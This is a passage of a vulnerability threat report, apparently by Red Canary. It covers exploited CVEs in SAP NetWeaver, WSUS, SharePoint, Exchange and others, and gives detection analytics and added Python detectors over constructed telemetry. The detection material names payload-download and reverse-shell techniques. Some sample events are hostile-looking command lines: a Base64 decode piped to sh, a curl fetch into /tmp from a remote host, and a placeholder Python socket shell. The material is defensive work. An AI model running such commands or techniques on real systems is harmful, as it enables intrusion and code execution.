Vulnerabilities

In 2025, Red Canary tracked vulnerabilities in software including SAP NetWeaver, Microsoft Windows Server Update Services, and SharePoint.

Analysis

Adversaries continue to leverage system, software, and firmware vulnerabilities to gain initial access. Left unaddressed, these weaknesses can endanger critical assets, leading to consequences like data breaches, financial losses, regulatory penalties, and lasting reputational damage.

Vulnerabilities in 2025

In addition to the usual CVEs in virtual private networks (VPNs) and firewall devices, bugs in large language models (LLMs) and critical severity vulnerabilities in JavaScript packages made headlines this past year, enabling adversaries to achieve remote code execution as well as escalate privileges and move laterally through environments, both on premises and in the cloud.

2025 saw a total of 48,172 vulnerabilities published to the National Vulnerability Database’s (NVD) list of Common Vulnerabilities and Exposures (CVE), more than a 20 percent increase from 2024.

Often, it’s not just the latest vulnerabilities making news. In July 2025, Akira ransomware compromises surged, stemming from unpatched SonicWall SSL VPN vulnerabilities, including CVE-2024-40766, which had been patched a year prior. According to a February 2025 report, the LockBit group exploited a 10.0 CVSS vulnerability in Atlassian Confluence from two years prior (CVE-2023-22527) to spread ransomware.

Even patched vulnerabilities continue to be leveraged successfully by adversaries for not merely weeks or months, but often for years.

Red Canary called our customers’ attention to several specific vulnerabilities in 2025:

CVE-2025-31324

This vulnerability, a missing authorization check in SAP NetWeaver, allows for unrestricted file uploads into a NetWeaver server, meaning an adversary could upload web shells and other arbitrary content to execute on the SAP NetWeaver server.

In reviewing post-exploitation activity, Red Canary observed Python reverse shell code spawning from known SAP processes in addition to the manipulation of web shell files followed by the download and execution of additional tools. In these scenarios, the adversaries used Base64-encoded commands to evade observation with process-monitoring tools.

To fix the vulnerability, SAP released a security advisory in May 2025, available to customers through its support portal, with additional guidance for patching affected components.

CVE-2025-59287

A critical RCE vulnerability in Microsoft’s Windows Server Update Services (WSUS) was patched in an out-of-band update in October 2025. Researchers reported shortly after the update that adversaries were actively targeting publicly exposed WSUS endpoints on default ports 8530/TCP and 8531/TCP and sending crafted requests that triggered a deserialization RCE. This led to PowerShell and Windows Command Shell executing Base64-encoded commands designed to enumerate user and network information related to the affected endpoint. Afterwards, the extracted information was sent to a remote webhook URL.

CVE-2025-53770 & CVE-2025-53771

These vulnerabilities allow unauthenticated remote code execution on a Microsoft SharePoint server, specifically on-premises versions of SharePoint Server, including SharePoint 2016 and 2019. By exploiting the vulnerabilities, an adversary may send serialized objects to the SharePoint server, causing arbitrary code to execute actions such as writing web shells, spawning PowerShell commands, and more.

In July 2025, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) and other community members reported widespread exploitation of the vulnerabilities. Later, Microsoft released customer guidance, including tactics, techniques, and procedures (TTPs), indicators of compromise (IOCs), and mitigation techniques for the vulnerabilities to further harden SharePoint servers against exploitation.

Take action

Vulnerabilities present a complex challenge. In a perfect world, you’d patch all the things, but because vulnerabilities differ widely in the software they affect and in their impact, it is difficult to offer universal prevention, mitigation, or response guidance. In addition, the stark reality of having only a few employees or a few dedicated hours in the day means that teams must spend their attention on vulnerabilities wisely.

Organizations should strategically prioritize their efforts by focusing resources on what poses the greatest threat to their own environment. An excellent starting point is monitoring CISA’s Known Exploited Vulnerabilities (KEV) Catalog to address flaws known to be actively exploited, along with remediating high-severity, remotely exploitable vulnerabilities and issues patched by vendors in out-of-band updates. Beyond this starting point, vulnerability scanning products and application inventory tools can help determine what software needs patching in very large environments.

CVE-2025-31324

Security teams should examine SAP web server access logs for any evidence of CVE-2025-31324 exploitation, specifically looking for evidence of unusual requests to the API endpoint /developmentserver/metadatauploader.

To hunt for additional evidence of web shell uploads, we recommend searching for unexpected Jakarta Server Pages (JSP) files within these folders on SAP servers:

  • j2ee\cluster\apps\sap.com\irj\servlet_jsp\irj\root
  • j2ee\cluster\apps\sap.com\irj\servlet_jsp\irj\work
  • j2ee\cluster\apps\sap.com\irj\servlet_jsp\irj\work\sync

CVE-2025-53770 & CVE-2025-53771

We recommend examining IIS web server access logs for additional evidence, specifically looking for evidence of unusual requests to a page at /_layouts/*/spinstall0.aspx.
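As an added example (not part of the report), a small Python hunt that applies both log-review steps above: it scans access log lines for the SAP NetWeaver /developmentserver/metadatauploader endpoint and for /_layouts/*/spinstall0.aspx requests, handling both Common Log Format and IIS W3C lines. The sample log lines are constructed; the field layout of your own SAP and IIS logs may differ.

```python
import re
from collections import namedtuple

# Request-path indicators taken from the report: the SAP NetWeaver upload endpoint and
# the SharePoint page path, where "*" in /_layouts/*/spinstall0.aspx is a version folder
# (15, 16, ...) and so becomes a single path-segment wildcard.
INDICATORS = {
    "CVE-2025-31324": re.compile(r"/developmentserver/metadatauploader", re.I),
    "CVE-2025-53770/53771": re.compile(r"/_layouts/[^/\s]+/spinstall0\.aspx", re.I),
}
# Matches the method and request path in both Common Log Format ("POST /path HTTP/1.1")
# and IIS W3C extended log lines (... POST /path - 443 ...).
REQUEST_RE = re.compile(r"\b(GET|POST|PUT|HEAD)\s+(\S+)", re.I)

Hit = namedtuple("Hit", "cve method path line")

def find_suspicious_requests(lines):
    """Return a Hit for every log line whose request path matches an indicator."""
    hits = []
    for line in lines:
        if line.startswith("#"):           # IIS W3C header lines (#Fields:, #Date:, ...)
            continue
        m = REQUEST_RE.search(line)
        if not m:
            continue
        method, path = m.group(1).upper(), m.group(2)
        for cve, pattern in INDICATORS.items():
            if pattern.search(path):
                hits.append(Hit(cve, method, path, line))
    return hits

# Constructed sample lines (not real telemetry): two CLF-style SAP access log entries
# followed by an IIS W3C header and two IIS entries, one benign and one matching.
SAMPLE_LOG = """\
203.0.113.7 - - [15/May/2025:10:12:03 +0000] "POST /developmentserver/metadatauploader HTTP/1.1" 200 512
203.0.113.7 - - [15/May/2025:10:12:09 +0000] "GET /irj/portal HTTP/1.1" 200 8901
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port c-ip sc-status
2025-07-19 02:41:55 10.0.0.5 GET /_layouts/15/start.aspx - 443 203.0.113.9 200
2025-07-19 02:42:01 10.0.0.5 POST /_layouts/15/spinstall0.aspx - 443 203.0.113.9 200
""".splitlines()

if __name__ == "__main__":
    for hit in find_suspicious_requests(SAMPLE_LOG):
        print(f"[{hit.cve}] {hit.method} {hit.path}")
```

Any hit on the SAP endpoint is worth a look, since legitimate traffic to it should be rare; pair it with the JSP file hunt above to confirm an upload actually landed.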

Detection opportunities

Detecting post-exploitation activity

Red Canary’s behavior-based approach to creating analytics enables detection of post-exploitation activity regardless of the vulnerability exploited. We’ve found over the years that, while vulnerabilities change often, adversaries return to a similar playbook after launching an exploit. We suggest using the following activity when looking for behavior associated with the above vulnerabilities, because the same analytics can also help identify signs of exploitation in other products in the future.

CVE-2025-31324

Security teams looking to develop detection coverage for behaviors observed following exploitation of SAP NetWeaver can include the following:

Base64-encoded commands in shell processes

Because the adversary employed Base64-encoded commands to evade casual observation, teams could look for encoded commands in Linux shell processes being used to download remotely hosted files. We commonly observe this activity in exploitation of other server products as well.

process == ('bash' || 'sh' || 'dash' || 'zsh')
&&
command_includes ('base64' && '-d')

curl downloading files in /tmp

Security teams could also look for adversaries leveraging curl to download files from a remote host into the /tmp folder. This may require tuning in your environment to account for deployment or maintenance tools.

process == (curl)
&&
wrote/modified_executable
&&
command_includes ('/tmp')

Python scripts establishing a socket to a remote host

In one scenario, Red Canary observed Python reverse shell code spawning from known SAP processes. Security teams could detect this by looking for any Python scripts that establish a socket to a remote host. A pro-tip for Python threat detection: Python executables often include a version number at the end of the executable name, and detection analytics specifying just a name of “Python” can miss activity. For a more resilient detection analytic, look for processes containing the string python rather than a strict ==.

process name includes 'python'
&&
command_includes (' -c ' ||  '.socket')
&&
command_includes ('.call(' || '.spawn(')
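The three SAP NetWeaver analytics above, expressed as runnable Python over a constructed batch of process events (an added example, not the report's own analytics). The wrote_executable field and the jstart parent process name are assumptions; map them to your EDR's schema.

```python
from dataclasses import dataclass

@dataclass
class ProcessEvent:
    """Minimal Linux process-start record; most EDR telemetry can be mapped onto these fields."""
    process: str                    # executable name, e.g. "bash" or "python3.11"
    cmdline: str
    parent: str = ""
    wrote_executable: bool = False  # the process created or modified an executable file

SHELLS = {"bash", "sh", "dash", "zsh"}

def base64_decode_in_shell(ev):
    """Analytic 1: a shell whose command line decodes Base64 ('base64' together with '-d')."""
    return ev.process in SHELLS and "base64" in ev.cmdline and "-d" in ev.cmdline

def curl_writing_to_tmp(ev):
    """Analytic 2: curl writing an executable under /tmp; tune for deployment and maintenance tools."""
    return ev.process == "curl" and ev.wrote_executable and "/tmp" in ev.cmdline

def python_socket_to_remote(ev):
    """Analytic 3: any python* interpreter (python3, python3.11, ...) running inline code that
    opens a socket and hands it to a subprocess call/spawn. The substring match on the process
    name is deliberate: a strict == 'python' would miss versioned interpreter names."""
    return ("python" in ev.process
            and (" -c " in ev.cmdline or ".socket" in ev.cmdline)
            and (".call(" in ev.cmdline or ".spawn(" in ev.cmdline))

ANALYTICS = [base64_decode_in_shell, curl_writing_to_tmp, python_socket_to_remote]

def evaluate(events):
    """Return {analytic_name: [matching command lines]} for a batch of events."""
    return {a.__name__: [ev.cmdline for ev in events if a(ev)] for a in ANALYTICS}

# Constructed sample events (not real telemetry). "jstart" stands in for an SAP NetWeaver
# Java server process; the Base64 payload and remote host are placeholders.
SAMPLE_EVENTS = [
    ProcessEvent("bash", "bash -c 'echo <BASE64_PLACEHOLDER> | base64 -d | sh'", parent="jstart"),
    ProcessEvent("curl", "curl -o /tmp/.tool http://203.0.113.9/tool", parent="bash", wrote_executable=True),
    ProcessEvent("curl", "curl -s https://monitoring.example.internal/health", parent="cron"),
    ProcessEvent("python3.11", "python3.11 -c 'import socket,subprocess; ... socket.socket() ... subprocess.call(...)'", parent="jstart"),
    ProcessEvent("python3", "python3 manage.py runserver", parent="systemd"),
]

if __name__ == "__main__":
    for name, matches in evaluate(SAMPLE_EVENTS).items():
        print(f"{name}: {len(matches)} hit(s)")
```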

CVE-2025-59287

Security teams looking for activity related to the WSUS vulnerability (CVE-2025-59287) can start by looking for the following behavior:

Abuse of Windows command shell for execution

Look for cmd.exe being spawned from the Windows Server IIS worker process (w3wp.exe) or the WSUS service binary wsusservice.exe, with a /c command that starts another cmd.exe /c instance. Command shells spawning from w3wp.exe are a common behavior of other IIS web server exploits and web shells, so a broad version of this detection analytic can cover IIS web server malfeasance in general.

Abuse of PowerShell to obfuscate commands

Another detection opportunity involves looking for the use of the shortened encodedCommand flag in PowerShell. Adversaries often try to obfuscate malicious code on an endpoint by wrapping it in an encoded command for PowerShell to execute.

CVE-2025-53770 & CVE-2025-53771

Execution of commands via a compromised web server

Similar to the WSUS vulnerability, for the SharePoint vulnerabilities, defenders could look for instances of a Windows IIS worker process (w3wp.exe) spawning Command Processor (cmd.exe) and either including a URL in the command line or creating files typically associated with executable web server code, among other outcomes.

Editor’s note: The remaining detection opportunities were included in earlier versions of the Threat Detection Report. While adversaries might no longer exploit some of the vulnerabilities referenced below, the detection opportunities are evergreen and capable of detecting unrelated but nonetheless malicious behavior.

Post-exploitation activity often stems from the exploited process. As such, looking for processes of external-facing applications conducting unknown or just plain weird activity could aid in detecting intrusion activity caused by an exploit. An example of this would be looking for parent-child process relationships of w3wp and cmd or powershell, as has been observed with various Microsoft Exchange vulnerabilities.

process == w3wp.exe
&&
child_process == ('cmd.exe' || 'powershell.exe')

Another example of this would be detecting instances of sqlservr.exe using cmd.exe to spawn a PowerShell process with subsequent network connection, as was the case with observed exploitation of CVE-2023-48788.

parent_process == sqlservr.exe
&&
process == cmd.exe
&&
child_process == powershell.exe
&&
has_network_connection
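The Windows analytics described above for WSUS (w3wp.exe or wsusservice.exe spawning nested cmd.exe /c, the shortened -EncodedCommand flag), the w3wp.exe to cmd.exe/powershell.exe relationship, and the sqlservr.exe chain all need one thing a single-event match does not: walking parent links. This added example (not Red Canary's code) builds a lineage for each process in a constructed snapshot and evaluates those four analytics; the list of -EncodedCommand spellings is an assumption.

```python
import re
from collections import namedtuple

# pid, parent pid, lower-case image name, command line, made-an-outbound-connection flag
Proc = namedtuple("Proc", "pid ppid image cmdline network", defaults=[False])
ROOT = Proc(-1, -1, "", "")  # sentinel that pads short lineages so indexing never fails
WEB_WORKERS = {"w3wp.exe", "wsusservice.exe"}
# Shortened spellings of -EncodedCommand (-e, -ec, -en, -enc); assumed list, extend as needed.
ENCODED_FLAG = re.compile(r"(?:^|\s)-e(?:c|n|nc|ncodedcommand)?(?=\s|$)", re.I)

def lineage(by_pid, p, depth=4):
    """[p, parent, grandparent, ...] following ppid links, padded with ROOT to `depth` entries."""
    chain = []
    while p is not None and len(chain) < depth:
        chain.append(p)
        p = by_pid.get(p.ppid)
    return chain + [ROOT] * (depth - len(chain))

def web_worker_spawning_shell(c):
    """w3wp.exe or wsusservice.exe spawning cmd.exe/powershell.exe (IIS, WSUS, SharePoint, Exchange)."""
    return c[0].image in {"cmd.exe", "powershell.exe"} and c[1].image in WEB_WORKERS
def nested_cmd_from_web_worker(c):
    """WSUS pattern: web worker -> cmd.exe /c -> cmd.exe /c."""
    return (c[0].image == c[1].image == "cmd.exe" and c[2].image in WEB_WORKERS
            and "/c" in c[0].cmdline.lower() and "/c" in c[1].cmdline.lower())
def encoded_powershell(c):
    """powershell.exe launched with a shortened -EncodedCommand flag."""
    return c[0].image == "powershell.exe" and bool(ENCODED_FLAG.search(c[0].cmdline))
def sqlservr_cmd_powershell_network(c):
    """sqlservr.exe -> cmd.exe -> powershell.exe that then makes a network connection."""
    return [x.image for x in c[:3]] == ["powershell.exe", "cmd.exe", "sqlservr.exe"] and c[0].network

ANALYTICS = [web_worker_spawning_shell, nested_cmd_from_web_worker,
             encoded_powershell, sqlservr_cmd_powershell_network]

def evaluate(procs):
    """Return {analytic_name: [matching pids]} over a snapshot of process-start events."""
    by_pid = {p.pid: p for p in procs}
    return {a.__name__: [p.pid for p in procs if a(lineage(by_pid, p))] for a in ANALYTICS}

# Constructed sample snapshot (not real telemetry); payloads are placeholders.
SAMPLE = [
    Proc(100, 4, "w3wp.exe", "w3wp.exe -ap WsusPool"),
    Proc(101, 100, "cmd.exe", 'cmd.exe /c "cmd.exe /c whoami"'),
    Proc(102, 101, "cmd.exe", "cmd.exe /c whoami"),
    Proc(200, 4, "sqlservr.exe", "sqlservr.exe -sMSSQLSERVER"),
    Proc(201, 200, "cmd.exe", "cmd.exe /c powershell.exe -enc <BASE64_PLACEHOLDER>"),
    Proc(202, 201, "powershell.exe", "powershell.exe -enc <BASE64_PLACEHOLDER>", True),
]
```

Because the lineage is fixed-depth and padded, each analytic is a plain tuple comparison, which is easy to port to a query language that exposes parent and grandparent fields.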

Ingress Tool Transfer

Following typical post-exploitation methodologies, we observed adversaries using various well-known methods to pull additional tools into a compromised environment to further their intrusion. This creates many detection opportunities for post-exploitation activity:

Certutil downloading additional payloads

Adversaries often use certutil.exe to download payloads during exploitation because it’s included with all Windows systems by default. It’s also pretty easy to detect downloads using the tool.

process == certutil.exe 
&&
command_includes ('urlcache' && 'split' && '-f')

Bitsadmin downloading additional payloads

Likewise, adversaries also use bitsadmin to download additional tools on a host to further their intrusion.

process == bitsadmin.exe
&&
command_includes ('download' || 'transfer') 

PowerShell downloading additional payloads

process == powershell.exe
&&
command_includes ('downloadstring' || 'downloaddata' || 'downloadfile' || 'iex' || '.invoke' || 'invoke-expression' || 'invoke-webrequest')

ProxyLogon (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065)

In March 2021, Microsoft released details of four Exchange Server vulnerabilities collectively known as “ProxyLogon.” If chained together, the vulnerabilities would allow an adversary remote code execution on a targeted Exchange server. Multiple adversaries, including the suspected Chinese state-sponsored group HAFNIUM, used the vulnerability chain to drop web shells and collect data from thousands of Exchange servers. Other adversaries used the DearCry ransomware to target unpatched servers as well. Microsoft released patches for these vulnerabilities at the time of initial reporting.

Microsoft Exchange Mailbox Replication service writing Active Server pages

Adversaries exploited ProxyLogon to drop web shells on vulnerable systems, which manifested as the msexchangemailboxreplication.exe service writing an ASPX file to disk. Malicious web shells will likely be placed on the web server in a web-accessible directory. The following analytic looks for the Exchange mailbox replication service creating ASPX files.

process == 'msexchangemailboxreplication.exe'
&&
filemod_extension == '.aspx'

ProxyShell (CVE-2021-31207, CVE-2021-34523, CVE-2021-34473)

In July of 2021, Microsoft released details of three new vulnerabilities in Exchange Server, which were dubbed “ProxyShell.” ProxyShell exploitation allows an adversary to remotely execute code without authentication. Following the exploitation, adversaries dropped web shells to conduct reconnaissance, move laterally, and in some instances, deploy ransomware. Where ProxyLogon seemed to have a high impact over a short period of time, ProxyShell seemed to persist longer. Detecting ProxyShell exploitation is similar to ProxyLogon mentioned above, specifically msexchangemailboxreplication.exe writing an ASPX web shell to disk.

PrintNightmare (CVE-2021-34527)

Also in July of 2021, security researchers and Microsoft released details of a new vulnerability dubbed “PrintNightmare” (CVE-2021-34527). PrintNightmare permits an unprivileged user to remotely obtain elevated privileges on any system running the print spooler service, which is enabled by default. It abuses a vulnerability in how the print spooler service fails to properly authenticate users attempting to load a printer driver dynamic link library (DLL). This zero day affected all editions of Windows, allowing code execution with local SYSTEM-level privileges.

Though the vulnerability was concerning, there were not many reported campaigns exploiting it. That said, ransomware operators such as Vice Society and Magniber have exploited the vulnerability to gain initial access, and therefore it’s worth looking out for. We observed a single malicious instance of PrintNightmare exploitation leading to precursor ransomware behaviors.

Windows print spooler service spawning cmd.exe

PrintNightmare exploitation results in a shell being opened on the targeted system as a child process of the spooler service. This detection analytic identifies the Windows print spooler service spawning a shell on the system.

parent_process == spoolsv.exe
&&
process == cmd.exe

Kaseya VSA (CVE-2021-30116)

Again in July 2021, adversaries leveraged multiple vulnerabilities in Kaseya Virtual Systems Administrator (VSA) to distribute Sodinokibi ransomware, also known as REvil. VSA allows IT administrators to remotely administer endpoints. By compromising this software, an adversary gains remote execution capability to a large subset of customer endpoints, especially if Kaseya is operated by a managed service provider (MSP).

Red Canary detected the initial behavioral activity using a preexisting analytic for identifying certutil.exe decoding content, as detailed below. Our Intelligence team had tracked Sodinokibi prior to this, which helped us identify the malicious registry modification of blacklivesmatter seen below and attribute it to Sodinokibi.

Certificate utility tool (certutil.exe) decoding content

This detection analytic will detect certutil.exe running with the -decode option. Adversaries frequently leverage certutil to decode Base64-encoded content.

process == certutil.exe
&&
command_includes ('decode')

ManageEngine products (CVE-2021-40539, CVE-2021-44077, CVE-2021-44515)

In November and December of 2021, we observed likely exploitation of remote code execution vulnerabilities in two different Zoho ManageEngine products: ADSelfService Plus (CVE-2021-40539) and ServiceDesk Plus (CVE-2021-44077). In one case, an incident response partner determined that ADSelfService Plus was used for initial access prior to deploying ransomware. The FBI noted that advanced adversaries exploited a vulnerability in a third ManageEngine product, Desktop Central. ManageEngine products are widely used among IT departments to manage various services across the enterprise. As such, this presents adversaries with a wide attack surface. Organizations using ManageEngine products in their environment should update accordingly. Patches for all the vulnerabilities listed here are available via ManageEngine.

Keytool.exe spawning system shell or PowerShell

For the vulnerability in ADSelfService Plus (CVE-2021-40539), we observed adversaries use the Java utility Keytool to move a web shell from the initial directory it was dropped into. As such, keytool.exe spawning shells should be investigated, and the following detection analytic should surface related activity.

parent_process == keytool.exe
&&
process == ('cmd.exe' || 'powershell.exe')
